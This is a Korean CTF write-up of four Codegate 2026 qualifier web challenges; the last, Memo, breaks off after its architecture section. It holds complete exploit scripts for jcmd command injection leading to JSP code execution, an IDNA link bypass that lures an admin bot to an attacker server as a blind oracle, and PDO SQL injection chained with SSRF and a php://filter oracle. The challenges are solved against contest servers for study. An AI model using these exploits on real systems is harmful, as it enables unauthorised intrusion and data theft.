Codegate CTF 2026 Quals Write-up
Codegate CTF 2026 Quals
대회 일정
2026-03-28 09:00 ~ 2026-03-28 24:00
대회 후기
RubiyaLab Expeditions 팀으로 Codegate CTF에 참여하였습니다.
저희 팀은 웹 5문제 중 5문제를 모두 해결하였고, 각 문제에 대한 Write-Up을 작성하였습니다.
Writeup
Juice of Apple, Vegetable, Apricot
jcmd 명령어를 래핑하여 JVM 상태를 조회하는 API를 제공하며, 최종 목표는 서버에서 /readflag SUID 바이너리를 실행하여 플래그를 획득하는 형태였습니다.
1. Command Injection in StatusServlet
/api/status 엔드포인트를 처리하는 StatusServlet에서 pid 파라미터를 jcmd 명령어에 그대로 포함합니다.
// StatusServlet.java
public class StatusServlet extends HttpServlet {
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp)
throws ServletException, IOException {
if (InputValidator.hasUnsafeParams(req)) {
resp.sendError(500);
return;
}
String pid = req.getParameter("pid");
if (pid == null || pid.isEmpty()) {
resp.sendError(500);
return;
}
String cmd = "jcmd " + pid + " VM.version";
Process p = Runtime.getRuntime().exec(cmd);
// ...
}
}
InputValidator를 통해 Bash 메타 문자를 필터링하고 있지만, 스페이스(whitespace)를 허용하고 있습니다.
// InputValidator.java
public class InputValidator {
private static final String BASH_SPECIAL = ";|&$`\\!(){}[]<>*?~^'\"";
public static boolean containsBashSpecial(String value) {
for (int i = 0; i < value.length(); i++) {
if (BASH_SPECIAL.indexOf(value.charAt(i)) >= 0) return true;
}
return false;
}
public static boolean hasUnsafeParams(HttpServletRequest req) {
Enumeration<String> paramNames = req.getParameterNames();
while (paramNames.hasMoreElements()) {
String value = req.getParameter(paramNames.nextElement());
if (value != null && containsBashSpecial(value)) return true;
}
return false;
}
}
Runtime.getRuntime().exec(cmd)는 문자열을 공백 기준으로 분리하여 실행하므로, pid 값에 스페이스를 포함시키면 jcmd에 추가로 명령어를 삽입할 수 있습니다.
pid=1 JFR.start filename=/tmp/test.jfr 파라미터 값 전달 시, 실제 실행되는 명령은 다음과 같습니다.
jcmd 1 JFR.start filename=/tmp/test.jfr VM.version
2. JFR을 이용한 임의 파일 쓰기
JFR(Java Flight Recorder)의 JFR.start 서브커맨드는 filename 옵션으로 레코딩 파일의 저장 경로를 지정할 수 있습니다. Dockerfile을 확인하면, /WEB-INF/views/ 디렉토리에 쓰기 권한이 부여되어 있었습니다.
RUN useradd -r -s /usr/sbin/nologin ctf \
&& chmod 1777 work temp logs webapps/ROOT/WEB-INF/views
USER ctf
따라서, filename을 /usr/local/tomcat/webapps/ROOT/WEB-INF/views/<name>.jsp로 지정하면 JFR 레코딩 파일을 JSP 파일로 저장할 수 있습니다.
3. JFR 레코딩에 JSP 코드 삽입
JFR 레코딩에 exceptions=all 옵션을 추가하면, 레코딩 중 발생하는 모든 예외 정보가 JFR 파일에 기록됩니다. 존재하지 않는 경로로 요청을 보내면 404 예외가 발생하며, 요청 경로가 에러 메시지에 포함됩니다.
<%=Runtime.getRuntime().exec((char)47+"readflag").inputReader().readLine()%>.jsp
위 경로로 요청을 보내면 404 에러가 발생하고, 에러 메시지에 JSP 코드가 포함된 채로 JFR 파일에 기록됩니다.
4. UrlFilenameViewController를 통한 JSP 실행
dispatcher-servlet.xml에 UrlFilenameViewController가 /** 패턴으로 매핑되어 있었고, InternalResourceViewResolver가 /WEB-INF/views/ prefix와 .jsp suffix로 설정되어 있었습니다.
<!-- dispatcher-servlet.xml -->
<bean class="org.springframework.web.servlet.view.InternalResourceViewResolver">
<property name="prefix" value="/WEB-INF/views/" />
<property name="suffix" value=".jsp" />
</bean>
<bean class="org.springframework.web.servlet.handler.SimpleUrlHandlerMapping">
<property name="order" value="2" />
<property name="mappings">
<props>
<prop key="/**">urlFilenameController</prop>
</props>
</property>
</bean>
<bean id="urlFilenameController"
class="org.springframework.web.servlet.mvc.UrlFilenameViewController" />
또한, web.xml에서 *.jsp 요청이 dispatcher 서블릿으로, /WEB-INF/views/* 경로는 JSP 엔진으로 매핑되어 있었습니다.
<!-- web.xml -->
<servlet-mapping>
<servlet-name>dispatcher</servlet-name>
<url-pattern>*.jsp</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>jsp</servlet-name>
<url-pattern>/WEB-INF/views/*</url-pattern>
</servlet-mapping>
따라서, /<name>.jsp로 요청을 보내면 UrlFilenameViewController가 이를 /WEB-INF/views/<name>.jsp 뷰로 해석하고, JSP 엔진이 해당 파일을 실행합니다. JFR 파일에 포함된 JSP 코드가 실행되어 /readflag 바이너리의 출력(플래그)을 응답에 포함시킵니다.
공격 흐름
/api/processes에서 Tomcat(Bootstrap) PID 확인/api/status?pid=<pid> JFR.start duration=4s filename=<views>/<name>.jsp settings=profile exceptions=all로 JFR 레코딩 시작 (Command Injection)- JSP scriptlet이 포함된 경로(
<%=Runtime.getRuntime().exec(...)%>.jsp)로 요청하여 예외 발생 → JFR에 JSP 코드 삽입 - JFR 레코딩 종료 후,
/<name>.jsp로 요청 → JSP 엔진이 JFR 파일 내 JSP 코드 실행 →/readflagRCE
Exploit Code
import re
import sys
import time
import uuid
from urllib.parse import quote
import requests
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:7777"
FLAG_RE = re.compile(rb"codegate2026\{[^}\r\n\x00]+\}")
# JSP scriptlet that executes /readflag and reads the output
TRIGGER_PATH = '<%=Runtime.getRuntime().exec((char)47+"readflag").inputReader().readLine()%>.jsp'
def get_pid(s):
"""Get Tomcat (Bootstrap) PID via /api/processes."""
r = s.get(f"{TARGET}/api/processes", timeout=5)
for proc in r.json():
if "Bootstrap" in str(proc.get("name", "")):
return str(proc["pid"])
return "1"
def exploit(s):
pid = get_pid(s)
jsp_name = uuid.uuid4().hex[:10]
jsp_path = f"/usr/local/tomcat/webapps/ROOT/WEB-INF/views/{jsp_name}.jsp"
duration = 4
# Step 1: Inject JFR.start via pid parameter to write a .jsp file
injected_pid = f"{pid} JFR.start duration={duration}s filename={jsp_path} settings=profile exceptions=all"
r = s.get(f"{TARGET}/api/status", params={"pid": injected_pid}, timeout=5)
if "Started recording" not in r.text:
print(f"[-] JFR start failed: {r.text[:200]}")
return None
print(f"[+] JFR recording started -> {jsp_name}.jsp")
# Step 2: Trigger an exception containing JSP scriptlet code
encoded = quote(TRIGGER_PATH, safe="")
s.get(f"{TARGET}/{encoded}", timeout=5)
print("[+] Triggered exception with scriptlet payload")
# Step 3: Wait for JFR recording to finish and fetch the JSP
time.sleep(duration + 2)
for i in range(5):
r = s.get(f"{TARGET}/{jsp_name}.jsp", timeout=5)
m = FLAG_RE.search(r.content)
if m:
return m.group(0).decode()
print(f"[*] Attempt {i+1}: status={r.status_code}, no flag yet")
time.sleep(1.5)
return None
def main():
print(f"[*] Target: {TARGET}")
s = requests.Session()
# Wait for jcmd to be ready
for _ in range(60):
try:
r = s.get(f"{TARGET}/api/status", params={"pid": "1"}, timeout=5)
if r.status_code == 200 and "OpenJDK" in r.text:
print("[+] jcmd is ready")
break
except Exception:
pass
time.sleep(3)
else:
print("[-] Timeout waiting for jcmd")
return 1
# Try multiple attempts
for attempt in range(5):
print(f"\n[*] Attempt {attempt + 1}/5")
flag = exploit(s)
if flag:
print(f"\n[!] FLAG: {flag}")
return 0
time.sleep(2)
print("\n[-] Failed to get flag")
return 1
if __name__ == "__main__":
sys.exit(main())
Flag
codegate2026{b404fe64a946c421243371e596ea6e859cb3406f28b469323b8337c96260c82431a77f1116e14f16fbdfc8132cf362d880f714dd2808c4249a9c769eae64170cdb88db}
RelayDesk
Go 기반의 멀티서비스 지원 티켓 시스템으로, API / Renderer / Worker / Admin-Bot 4개 서비스와 PostgreSQL, Redis로 구성되어 있습니다. 플래그는 /run/relaydesk/workspace-context 파일에 저장되며, workspace archive의 4-gram sliding window oracle을 통해 한 글자씩 추출할 수 있습니다.
핵심 취약점: IDNA 호환 문자(。 U+3002)를 이용한 review link authority bypass + CSP frame-src wildcard를 통해 admin-bot을 공격자 서버로 유도하고, workspace asset slot endpoint를 blind oracle로 활용하여 플래그를 복원할 수 있습니다.
서비스 아키텍처
Client → API(:8080) → PostgreSQL / Redis
↓
Worker (mail_jobs polling)
↓
mail_messages 생성
↓
Admin-Bot (inbox polling)
↓
Renderer(:8081) iframe 렌더링
↓
review link iframe → postMessage
↓
/mail/open → workspace visit grant 발급
↓
/mail/queue/resume → /mail/queue/assets (oracle)
1. Workspace Context와 4-gram Archive
db/seed.sh에서 플래그가 포함된 workspace context를 생성합니다.
WORKSPACE_CONTEXT="analyst handoff export codegate2026{FAKE_FLAG}"
printf '%s\n' "${WORKSPACE_CONTEXT}" > "${WORKSPACE_CONTEXT_FILE}"
이 문자열은 workspace.NewArchive()에서 4글자 sliding window로 분해되어 fragment set으로 저장됩니다.
// internal/workspace/archive.go
const archiveWindowSize = 4
func NewArchive(raw string) Archive {
normalized := NormalizeQuery(raw)
out := Archive{normalized: normalized, fragments: map[string]struct{}{}}
for start := 0; start+archiveWindowSize <= len(normalized); start++ {
fragment := NormalizeQuery(normalized[start : start+archiveWindowSize])
out.fragments[fragment] = struct{}{}
}
return out
}
func (a Archive) HasFragment(query string) bool {
query = NormalizeQuery(query)
if len(query) != archiveWindowSize {
return false
}
_, ok := a.fragments[query]
return ok
}
/mail/queue/assets/{resumeRef}/{slot}.js 엔드포인트가 HasFragment(query)의 결과에 따라 200/404를 반환하므로, 이를 blind oracle로 활용할 수 있습니다.
// cmd/api/main.go - handleQueueAsset
func (s *server) handleQueueAsset(w http.ResponseWriter, r *http.Request) {
resumeRef := workspace.NormalizeRef(chi.URLParam(r, "resumeRef"))
slot := workspace.NormalizeSlot(chi.URLParam(r, "slot"))
visitToken := workspace.NormalizeVisitToken(r.URL.Query().Get("rv"))
query := workspace.NormalizeQuery(r.URL.Query().Get("q"))
bucket := workspace.NormalizeBucket(r.URL.Query().Get("bucket"))
if workspace.AssetSlot(resumeRef, query, bucket, visitToken) != slot {
http.NotFound(w, r)
return
}
ok, err := s.consumeWorkspaceVisit(r.Context(), resumeRef, visitToken)
if err != nil || !ok {
http.NotFound(w, r)
return
}
if !s.archive.HasFragment(query) { // ← oracle: 4-gram 존재 여부
http.NotFound(w, r)
return
}
w.Header().Set("Content-Type", "application/javascript; charset=utf-8")
_, _ = io.WriteString(w, `window._relaydeskWorkspaceAsset=(window.__relaydeskWorkspaceAsset||0)+1;`)
}
oracle을 사용하려면 유효한 resumeRef(wid)와 visitToken(rv)이 필요합니다. 이는 admin-bot이 workspace를 방문할 때 발급됩니다.
2. IDNA Bypass를 통한 Review Link 조작
review link의 authority 검증은 canonicalizeEdgeAuthority()에서 수행됩니다.
// internal/handoff/handoff.go
func canonicalizeEdgeAuthority(raw string) (string, bool) {
raw = strings.TrimSpace(raw)
if i := strings.LastIndex(raw, "@"); i >= 0 {
raw = raw[i+1:]
}
decoded := collapseEscapedHost(raw)
usedDecode := decoded != raw
raw = strings.NewReplacer("。", ".", ".", ".", "。", ".").Replace(decoded)
usedCompatDot := raw != decoded
compat := false
if i := strings.IndexByte(raw, '['); i >= 0 {
if usedDecode && usedCompatDot && i > 0 && raw[i-1] == '.' {
raw = raw[:i] // ← IPv6 bracket 이전까지만 authority로 사용
compat = true
}
}
if i := strings.IndexByte(raw, ':'); i >= 0 {
raw = raw[:i] // port 제거
}
// IDNA 정규화 후 반환
ascii, err := idna.Lookup.ToASCII(strings.ToLower(raw))
// ...
return strings.Trim(b.String(), "."), compat
}
핵심은 。(U+3002, Ideographic Full Stop)가 .으로 치환된다는 점입니다. 다음 URL을 구성하면:
http://brief.relaydesk.local%E3%80%82[::ffff:ATTACKER_IP]:PORT/notes/TASK_ID
Edge reference 검증 시: %E3%80%82가 URL-unescape되어 。가 되고, .으로 치환되면 brief.relaydesk.local.[::ffff:...] → [ 앞에서 잘려 authority가 brief.relaydesk.local이 됩니다. 즉, ReferencePortalHost()의 기대값과 일치하므로 검증을 통과합니다.
Delivery reference 검증 시 (url.Parse 사용): Go 표준 라이브러리는 %E3%80%82를 도메인의 일부로 해석하여 전혀 다른 authority를 반환합니다. edgeRef.Authority != deliveryRef.Authority 조건도 만족합니다.
실제 브라우저 동작: Chromium은 %E3%80%82를 .으로 정규화하므로 [::ffff:ATTACKER_IP]:PORT를 host로 인식하여 공격자 서버에 접속하게 됩니다.
3. CSP frame-src Wildcard
Renderer의 CSP에서 frame-src는 portal origin의 port가 있으면 scheme://*:port로 설정됩니다.
// cmd/renderer/main.go
func rendererCSP(nonce, portalOrigin string) string {
frameSrc := "frame-src 'none'; child-src 'none'"
if portalOrigin != "" {
frameSrc = "frame-src " + frameSourceForPortal(portalOrigin) + "; child-src " + frameSourceForPortal(portalOrigin)
}
return "default-src 'none'; script-src 'nonce-" + nonce + "'; img-src 'self'; connect-src 'self'; " +
frameSrc + "; worker-src 'none'; object-src 'none'; form-action 'none'; base-uri 'none'"
}
func frameSourceForPortal(portalOrigin string) string {
parsed, err := url.Parse(portalOrigin)
if err != nil {
return "'none'"
}
scheme := parsed.Scheme
if port := parsed.Port(); port != "" {
return scheme + "://*:" + port // ← 모든 호스트 허용
}
return scheme + ":"
}
portal origin에 port가 존재할 경우, CSP가 모든 호스트의 iframe을 허용하게 됩니다.
4. Renderer의 Iframe 생성 조건
// cmd/renderer/main.go - mailTemplate
if (
messageState &&
messageState.link &&
messageState.portal_origin &&
messageState.mode === 'inline' &&
messageState.thread_id === expectedThreadKey &&
messageState.resume_path &&
hasRequiredTags(messageState)
) {
reviewFrame = document.createElement('iframe');
reviewFrame.src = String(messageState.link);
// ...
}
조건을 만족시키려면 ticket의 HTML body에 다음 구조의 action card를 삽입해야 합니다:
<section class="message-card">
<a class="summary-link"
href="REVIEW_LINK"
data-mode="inline"
data-tags="summary,activity,notes"
data-thread-id="THREAD_ID">x</a>
</section>
이 HTML은 continuation.ExtractActionCard()에 의해 파싱되어 automation_context로 저장됩니다.
// internal/continuation/continuation.go
func isReferenceContainer(tag string, attrs map[string]string) bool {
if tag != "section" && tag != "div" && tag != "article" {
return false
}
layout := strings.ToLower(strings.TrimSpace(firstAttr(attrs, "data-layout", "data-template")))
if layout == "compact" || layout == "summary" || layout == "digest" {
return true
}
className := attrValue(attrs, "class")
return hasAnyClassToken(className, "message-summary", "message-panel","queue-summary", "message-card")
}
5. Admin-Bot 동작 흐름
// admin-bot/bot.mjs
async function reviewInboxItem(browser, inboxID) {
// ...
await mailPage.goto(`${APP}/mail/view/${inboxID}`, { waitUntil: 'domcontentloaded' });
const navigatedAway = await mailPage.waitForURL(
(url) => !url.pathname.startsWith('/mail/view/'),
{ timeout: NAVIGATION_TIMEOUT_MS }
).then(() => true).catch(() => false);
// ...
}
Bot이 /mail/view/{id}를 방문하면:
- API가 Renderer iframe을 포함한 페이지 반환
- Renderer가 review link를 iframe으로 로드 (공격자 서버)
- 공격자 서버가
relaydesk:resume-readypostMessage 전송 - Renderer가
relaydesk:open-linked-workspacepostMessage를 parent로 전송 - Parent가
/mail/open/{messageID}?sig=...을 호출하여 workspace URL 획득 - Bot이 workspace URL로 네비게이션 → URL에
wid와rv파라미터 포함 - 공격자 서버가
wid/rv를 수신하여 oracle query 수행
6. 공격 흐름
Seed Ticket 생성
handoff+digest+managed 프로필로 workspace 기능을 활성화하는 seed ticket을 생성합니다.
PROFILE = {
"workspace": {"locale": "digest", "segment": "managed"},
"channels": [{"kind": "mail", "target": "case-notes@relaydesk.local", "label": "thread"}],
}
ticket이 awaiting_reply 상태가 될 때까지 polling합니다.
Followup Ticket으로 Oracle Probe 전송
각 4-gram fragment마다 followup ticket을 생성합니다. HTML body에 IDNA bypass review link를 포함시킵니다.
link = f"http://brief.relaydesk.local%E3%80%82[{MAPPED_IP}]:{PUBLIC_PORT}/notes/{tid}"
html = (
f'<section class="message-card">'
f'<a class="summary-link" href="{link}" data-mode="inline" '
f'data-tags="summary,activity,notes" data-thread-id="{THREAD_ID}">x</a>'
f'</section>'
)
Oracle 응답 수신 및 판정
공격자의 HTTP 서버가 bot의 요청에서 wid/rv를 추출하고, AssetSlot 해시를 계산하여 /mail/queue/assets/ 엔드포인트에 요청합니다.
slot = fnv1a32(f"{wid}|{task['fragment']}|{task['bucket']}|{rv}")
url = f"{BASE_URL}/mail/queue/assets/{wid}/{slot}.js"
r = http_session.get(url, params={"q": task["fragment"], "bucket": task["bucket"], "rv": rv})
task["result"] = (r.status_code == 200) # 200이면 fragment 존재
플래그 복원
codegate2026{ 접미사 3글자부터 시작하여, 매 depth마다 가능한 hex 문자를 붙여 4-gram 존재 여부를 테스트합니다.
존재하는 branch만 확장하여 최종적으로 전체 플래그를 복원합니다.
Exploit Code
"""RelayDesk CTF Exploit — Blind 4-gram oracle to extract flag from workspace-context."""
import http.server, socket, threading, time, uuid
from urllib.parse import parse_qs, urlparse
import requests
# ─── Config ───
BASE_URL = "http://3.35.23.4:18080"
PUBLIC_IPV4 = "3.39.25.30"
PUBLIC_PORT = 8888
LISTEN_PORT = 8888
SUBMITTER = "attacker@example.com"
FLAG_PREFIX = "codegate2026{"
HEX_LEN = 24
HEX_ALPHA = "0123456789abcdef"
# ─── Helpers ───
def fnv1a32(s):
h = 0x811C9DC5
for b in s.encode():
h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
return f"{h:08x}"
def ip_mapped(ip):
import ipaddress
p = ipaddress.IPv4Address(ip).packed
return f"::ffff:{(p[0]<<8)|p[1]:x}:{(p[2]<<8)|p[3]:x}"
MAPPED_IP = ip_mapped(PUBLIC_IPV4)
SUBJECT = f"relay-{uuid.uuid4().hex[:8]}"
THREAD_ID = SUBJECT.lower()
PROFILE = {
"workspace": {"locale": "digest", "segment": "managed"},
"channels": [{"kind": "mail", "target": "case-notes@relaydesk.local", "label": "thread"}],
}
http_session = requests.Session()
tasks = {}
# ─── Oracle HTTP Server ───
def start_server():
def handle(handler):
parsed = urlparse(handler.path)
parts = [p for p in parsed.path.split("/") if p]
qs = parse_qs(parsed.query)
task = tasks.get(parts[1]) if len(parts) >= 2 and parts[0] == "notes" else None
if task and not task["event"].is_set():
wid = qs.get("wid", [""])[0]
rv = qs.get("rv", [""])[0]
if wid and rv:
slot = fnv1a32(f"{wid}|{task['fragment']}|{task['bucket']}|{rv}")
url = f"{BASE_URL}/mail/queue/assets/{wid}/{slot}.js"
r = http_session.get(url, params={"q": task["fragment"], "bucket": task["bucket"], "rv": rv}, timeout=15)
task["result"] = (r.status_code == 200)
task["event"].set()
body = b"<!doctype html><script>try{parent.postMessage({type:'relaydesk:resume-ready'},'*')}catch(e){}</script>"
handler.send_response(200)
handler.send_header("Content-Type", "text/html")
handler.send_header("Content-Length", str(len(body)))
handler.end_headers()
handler.wfile.write(body)
class H(http.server.BaseHTTPRequestHandler):
do_GET = lambda self: handle(self)
log_message = lambda *_: None
class S(http.server.ThreadingHTTPServer):
address_family = socket.AF_INET6
daemon_threads = True
def server_bind(self):
try: self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except: pass
super().server_bind()
srv = S(("::", LISTEN_PORT), H)
threading.Thread(target=srv.serve_forever, daemon=True).start()
return srv
# ─── Ticket Operations ───
def sync_and_seed():
http_session.post(f"{BASE_URL}/api/v1/support/profile/sync", json={
"submitter_email": SUBMITTER, "subject": SUBJECT,
"body_html": "<p>seed</p>", "body_text": "seed", **PROFILE
}).raise_for_status()
r = http_session.post(f"{BASE_URL}/api/v1/support/tickets", json={
"submitter_email": SUBMITTER, "subject": SUBJECT,
"body_html": "<p>seed</p>", "body_text": "seed",
})
r.raise_for_status()
pid = r.json()["ticket_id"]
for _ in range(120):
s = http_session.get(f"{BASE_URL}/api/v1/support/tickets/{pid}/status").json().get("status")
if s in ("awaiting_reply", "conversation_linked"):
print(f"[+] seed ready: {pid}")
return pid
time.sleep(0.25)
raise TimeoutError("seed ticket never ready")
def submit_probe(fragment):
tid = uuid.uuid4().hex
bucket = "b" + tid[:11]
tasks[tid] = {"fragment": fragment, "bucket": bucket, "event": threading.Event(), "result": None}
link = f"http://brief.relaydesk.local%E3%80%82[{MAPPED_IP}]:{PUBLIC_PORT}/notes/{tid}"
html = (
f'<section class="message-card">'
f'<a class="summary-link" href="{link}" data-mode="inline" '
f'data-tags="summary,activity,notes" data-thread-id="{THREAD_ID}">x</a>'
f'</section>'
)
http_session.post(f"{BASE_URL}/api/v1/support/tickets", json={
"submitter_email": SUBMITTER, "subject": SUBJECT,
"body_html": html, "body_text": fragment,
}).raise_for_status()
return tasks[tid]
# ─── Oracle Query ───
def query(fragments):
probes = []
for f in dict.fromkeys(fragments):
probes.append(submit_probe(f))
time.sleep(0.03)
results = {}
for p in probes:
p["event"].wait(timeout=45)
results[p["fragment"]] = p["result"]
return results
cache = {}
def solve():
total_depth = HEX_LEN + 1
branches = [(FLAG_PREFIX[-3:], "")]
for depth in range(total_depth):
alpha = "}" if depth == total_depth - 1 else HEX_ALPHA
candidates = {}
for i, (suffix, _) in enumerate(branches):
for c in alpha:
frag = suffix + c
if frag not in candidates:
candidates[frag] = []
candidates[frag].append((i, c))
to_query = [f for f in candidates if f not in cache]
if to_query:
cache.update(query(to_query))
next_branches = []
for i, (suffix, built) in enumerate(branches):
for c in alpha:
frag = suffix + c
if cache.get(frag):
next_branches.append((frag[-3:], built + c))
branches = next_branches
print(f" depth {depth+1}/{total_depth}: {len(branches)} branch(es)")
if not branches:
raise RuntimeError(f"no surviving branches at depth {depth+1}")
if len(branches) != 1:
raise RuntimeError(f"expected 1 solution, got {len(branches)}")
return FLAG_PREFIX + branches[0][1]
# ─── Main ───
if __name__ == "__main__":
srv = start_server()
print(f"[*] oracle listener on :{LISTEN_PORT}")
try:
sync_and_seed()
flag = solve()
print(f"[+] FLAG: {flag}")
finally:
srv.shutdown()
Flag
codegate2026{f46e201da62830c0f777855b}
ERP System
PHP 8.4 + Apache + MySQL 8.0.45 기반의 ERP 시스템입니다. 플래그는 /secret/secret_N 파일에 한 글자씩 저장되어 있습니다.
제공된 계정: mkim:erp123 (일반 유저 10개), admin:UNKNOWN
공격 체인은 다음과 같습니다:
- SQL Injection으로 admin 비밀번호 추출
- admin 세션으로
hash.php접근 - SSRF(DNS rebinding)로 localhost 접근 제한 우회
- php://filter chain oracle로
/secret/secret_N파일 한 글자씩 leak - sha256 brute-force로 플래그 복원
1. db.php
db.php를 보면, PDO 객체를 생성하여 DB 연결을 하는 것으로 보입니다.
<?php
$dbHost = getenv('DB_HOST') ?: 'db';
$dbName = getenv('DB_NAME') ?: 'mydb';
$dbUser = getenv('DB_USER') ?: 'root';
$dbPass = getenv('DB_PASSWORD') ?: 'root';
$dsn = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', $dbHost, $dbName);
$pdo = new PDO(
$dsn,
$dbUser,
$dbPass,
);
?>
2. index.php - SQL Injection
col 파라미터에 백틱이 포함될 경우, 백틱 이스케이핑이 수행됩니다.
$colParam = $_GET['col'] ?? null;
$nameParam = $_GET['name'] ?? null;
$selectColumns = $colParam
? '`' . str_replace('`', '``', $colParam) . '`'
: 'full_name, department, position, salary, email';
이후, $selectColumns 값은 쿼리에 column 부분으로 들어갑니다.
$stmt = $pdo->prepare("SELECT $selectColumns FROM employees WHERE full_name = ?");
$stmt->execute([$nameParam]);
위 Prepared Statement 구문은 일반적으로 안전해보이지만, PDO SQL 파서 과정에서 문제가 존재하여 우회가 발생합니다.
PDO는 완전한 SQL 파서 방식이 아닌 placeholder(?)만 찾는 Tokenizer를 사용합니다.
위와 같은 유형의 SQL 쿼리문에서 column 부분에 \?#\x00 값을 전달할 경우, 삽입된 ? 문자를 바인딩 파라미터로 인식하고 ` FROM employees WHERE full_name = ?` 쿼리문을 주석으로 인식하여 SQL Injection이 가능하게 됩니다.
[참고] https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
그리하여, 아래 요청을 통해 admin의 비밀번호를 추출할 수 있습니다.
GET /index.php?col=\?#\x00&download=1&name=x` FROM (SELECT HEX(password) AS `'x` FROM users WHERE is_admin=1 LIMIT 1)y;#
3. hash.php - SSRF
admin 전용 엔드포인트로, 관리자 여부를 확인합니다.
if (!$_SESSION['is_admin']) {
die("Error: You are not authorized to access this page!");
}
$filter, $resource 파라미터를 받아 php://filter를 적용한 뒤 file_get_contents로 내용을 가져옵니다.
필터 정규식은 /^[a-zA-Z0-9.|_-]+$/로, convert.base64-encode, convert.iconv.X.Y, string.rot13 등 다양한 php 내장 필터를 사용할 수 있습니다.
단, gethostbyname() 함수를 통해 호스트 IPv4 값이 로컬 IP 인지 확인합니다. 하지만, 외부 HTTP redirect 서버 (httpbin.org/redirect-to)를 활용하여 SSRF가 가능합니다.
resource에 외부 URL을 전달 → IP 검증 통과- 해당 URL이
http://127.0.0.1/secret.php?...로 redirect file_get_contents가 redirect를 따라가 localhost의secret.php에 접근
$filter = $_GET['filter'] ?? '';
$resource = $_GET['resource'] ?? '';
if($filter == '' || $resource == '') {
die("Usage: ?filter=filter&resource=resource");
}
if (!preg_match('/^[a-zA-Z0-9.|_-]+$/', $filter)) {
die("Error: Invalid characters or syntax found.");
}
$parsed = parse_url($resource);
if ($parsed === false || !isset($parsed['scheme']) || !isset($parsed['host'])) {
die("Error: Invalid URL format or missing scheme/host.");
}
$scheme = $parsed['scheme'];
$host = $parsed['host'];
if (strtolower($scheme) !== 'http') {
die("Error: Only valid HTTP URLs are allowed.");
}
$ip = gethostbyname($host);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
die("Error: Access to local/private network is prohibited.");
}
$target = "php://filter/read=" . $filter . "|hash.sha256" . "/resource=" . $resource;
$content = file_get_contents($target);
echo $content;
4. secret.php - Localhost Only Flag Reader
127.0.0.1에서만 접근 가능하며, /secret/secret_N 파일을 읽습니다.
/secret/secret_N 파일에는 플래그가 한 글자씩 개별 파일에 저장되어 있어 이를 알아내면 플래그를 획득할 수 있습니다.
SECRET="codegate2026{fake_flag}"
for ((i=0; i<${#SECRET}; i++)); do
echo -n "${SECRET:i:1}" > /secret/secret_$i
done
$ip = $_SERVER['REMOTE_ADDR'];
if($ip != '127.0.0.1') {
die("Error: You are not authorized to access this page!");
}
$target = "php://filter/read=" . $filter . "/resource=" . "/secret/secret_" . $index;
$content = file_get_contents($target);
$salt = bin2hex(random_bytes(16));
echo "Secret: " . $content . "/" . $index . "/" . $salt;
단, 랜덤 솔트가 추가되므로, hash.php에서 sha256을 거친 결과로는 직접적인 역산이 불가능합니다.
하지만, convert.iconv*를 반복하고 앞에 dechunk를 남겨두어 OOM(Out of Memory) 오류가 발생하는 것을 오라클로 활용하여 한 글자씩 알아낼 수 있습니다.
Exploit Code
#!/usr/bin/env python3
import argparse, base64, sys, requests
from urllib.parse import quote
sys.path.insert(0, "./php_filter_chains_oracle_exploit")
from filters_chain_oracle.core.bruteforcer import Bruteforcer
REDIR = "http://httpbin.org/redirect-to"
def sqli_admin_pw(url):
s = requests.Session()
s.post(f"{url}/login.php", data={"username": "mkim", "password": "erp123"}, allow_redirects=False)
r = s.get(f"{url}/index.php", params={
"col": "\\?#\x00", "download": "1",
"name": "x` FROM (SELECT HEX(password) AS `'x` FROM users WHERE is_admin=1 LIMIT 1)y;#",
})
return bytes.fromhex(r.text.strip()).decode()
def login(url, user, pw):
s = requests.Session()
s.post(f"{url}/login.php", data={"username": user, "password": pw}, allow_redirects=False)
return s
class Oracle(Bruteforcer):
FLIP = "convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.UCS-4|convert.base64-decode|convert.base64-encode"
FLIP_WARNING_FRIENDLY = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.UCS-4|convert.base64-decode|convert.base64-encode"
R4 = "convert.iconv.UCS-4LE.UCS-4"
def __init__(self, sess, url, idx, redir):
super().__init__(offset=0)
self.sess, self.url = sess, f"{url}/hash.php"
inner = f"http://127.0.0.1/secret.php?index={idx}&filter=string.rot13|string.rot13"
self.res = f"{redir}?url={quote(inner, safe='')}"
def send(self, filters):
try:
r = self.sess.get(self.url, params={"filter": filters, "resource": self.res}, timeout=15)
return r.status_code >= 500
except:
return True
def leak_char(sess, url, idx, redir):
o = Oracle(sess, url, idx, redir)
t = "".join(o.find_value(p) for p in (10, 11))
return chr(base64.b64decode("Oi" + t)[2])
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--url", required=True)
ap.add_argument("--redir", default=REDIR)
ap.add_argument("--start", type=int, default=0)
ap.add_argument("--max", type=int, default=64)
a = ap.parse_args()
url = a.url.rstrip("/")
pw = sqli_admin_pw(url)
print(f"[+] admin pw: {pw}")
sess = login(url, "admin", pw)
flag = []
for i in range(a.start, a.start + a.max):
ch = leak_char(sess, url, i, a.redir)
flag.append(ch)
print(f" [{i:02d}] {ch} {''.join(flag)}", flush=True)
if ch == "}":
break
print(f"\n[+] Flag: {''.join(flag)}")
if __name__ == "__main__":
main()
Flag
codegate2026{king_of_filters_can_eat_tags}
Memo
서비스 아키텍처
Docker Compose로 4개의 서비스가 구성되어 있습니다.
핵심은 bot이 external 네트워크에만 연결되어 있어 nginx를 통해서만 앱에 접근할 수 있고, internal 네트워크의 web/mongo에는 직접 접근할 수 없다는 점입니다.
services:
nginx: # TLS reverse proxy (port 443)
networks: [external, internal]
web: # NestJS app (port 3000)
networks: [internal]
mongo: # MongoDB
networks: [internal]
bot: # Puppeteer admin bot (port 5000)
networks: [external]
- nginx: HTTPS(443) + HTTP/2로 NestJS 앱에 프록시
